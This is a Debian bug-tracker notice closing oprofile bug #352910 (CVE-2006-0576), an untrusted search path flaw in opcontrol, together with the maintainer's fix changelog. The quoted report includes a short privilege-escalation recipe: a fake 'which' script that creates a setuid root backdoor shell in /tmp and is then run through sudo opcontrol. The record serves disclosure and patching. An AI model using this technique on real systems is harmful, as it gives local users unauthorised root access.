Your message dated Fri, 17 Feb 2006 10:47:13 -0800
with message-id <[EMAIL PROTECTED]>
and subject line Bug#352910: fixed in oprofile 0.9.1-9
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--- Begin Message ---
Package: oprofile
Severity: normal

CVE-2006-0576 reads:

Untrusted search path vulnerability in opcontrol in OProfile 0.9.1 and
earlier allows local users to execute arbitrary commands via a modified 
PATH that references malicious (1) which or (2) dirname programs. 
NOTE: while opcontrol normally is not run setuid, a common configuration 
suggests accessing opcontrol using sudo. In such a context, this is a
vulnerability.                                                                  
                                          

Giving sudo to oprofile is apparantly a very common practice.

>From the original report:

Whoever coded the script tried protecting it against executing binaries
out of a safe PATH by defining one on line 1416:  
PATH=/usr/local/bin:/usr/local/sbin:/bin:/sbin:/usr/bin:/usr/sbin               
                                    

The problem is that this script does not check where the 'which' or 
'dirname' binary is executed from on line 1413/1414.                            
                                              

This enables a malicious user to execute arbitrary code by using the
following pseudo'exploit':                                                      
                                              
                            cat > which                                         
                                                                
                            #!/bin/sh                                           
                                                                
                            /bin/cp /bin/bash /tmp/backdoor                     
                                                                
                            /bin/chmod 6755 /tmp/backdoor                       
                                                                
                            ^C                                                  
                                                                
                            set PATH="."                                        
                                                                
                            /usr/bin/sudo /usr/local/bin/opcontrol

This is a relatively low severity vulnerability, but easily fixed.

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.15-1-686-smp
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)


--- End Message ---
--- Begin Message ---
Source: oprofile
Source-Version: 0.9.1-9

We believe that the bug you reported is fixed in the latest version of
oprofile, which is due to be installed in the Debian FTP archive:

oprofile-common_0.9.1-9_i386.deb
  to pool/main/o/oprofile/oprofile-common_0.9.1-9_i386.deb
oprofile-gui_0.9.1-9_i386.deb
  to pool/main/o/oprofile/oprofile-gui_0.9.1-9_i386.deb
oprofile-source_0.9.1-9_i386.deb
  to pool/main/o/oprofile/oprofile-source_0.9.1-9_i386.deb
oprofile_0.9.1-9.diff.gz
  to pool/main/o/oprofile/oprofile_0.9.1-9.diff.gz
oprofile_0.9.1-9.dsc
  to pool/main/o/oprofile/oprofile_0.9.1-9.dsc
oprofile_0.9.1-9_i386.deb
  to pool/main/o/oprofile/oprofile_0.9.1-9_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Al Stone <[EMAIL PROTECTED]> (supplier of updated oprofile package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Fri, 17 Feb 2006 11:22:41 -0700
Source: oprofile
Binary: oprofile-common oprofile oprofile-gui oprofile-source
Architecture: source i386
Version: 0.9.1-9
Distribution: unstable
Urgency: low
Maintainer: Al Stone <[EMAIL PROTECTED]>
Changed-By: Al Stone <[EMAIL PROTECTED]>
Description: 
 oprofile   - system-wide profiler for Linux systems
 oprofile-common - system-wide profiler for Linux systems (command line 
components)
 oprofile-gui - system-wide profiler for Linux systems (GUI components)
 oprofile-source - Source for the OProfile driver
Closes: 352910
Changes: 
 oprofile (0.9.1-9) unstable; urgency=low
 .
   * Closes: bug#352910 -- CVE-2006-0576: Untrusted search path vulnerability
     in opcontrol (re-used patch from CVS HEAD)
Files: 
 7bddc1ebdb61867f4ad6601d39a6da77 787 devel optional oprofile_0.9.1-9.dsc
 822e869f229113ac639ee17f0eaf48a7 106206 devel optional oprofile_0.9.1-9.diff.gz
 b244e34676db8dcc704344a58648ba7b 182916 devel optional 
oprofile_0.9.1-9_i386.deb
 84322859101c6f34371a0694658d6e6c 3894534 devel optional 
oprofile-common_0.9.1-9_i386.deb
 fd0ef7adb004cd23a0c32cf15dc2f607 88680 devel optional 
oprofile-gui_0.9.1-9_i386.deb
 f302e67e3d8b6dd0036171614637a201 342942 devel optional 
oprofile-source_0.9.1-9_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFD9hbSso6+T7qY4V0RApc5AJ40xUJ2LCcaoFoOXRwN9PjLpvDDoQCeKy+0
j+hpb2VmmyDdqveihUr0qhk=
=bwj5
-----END PGP SIGNATURE-----


--- End Message ---

Reply via email to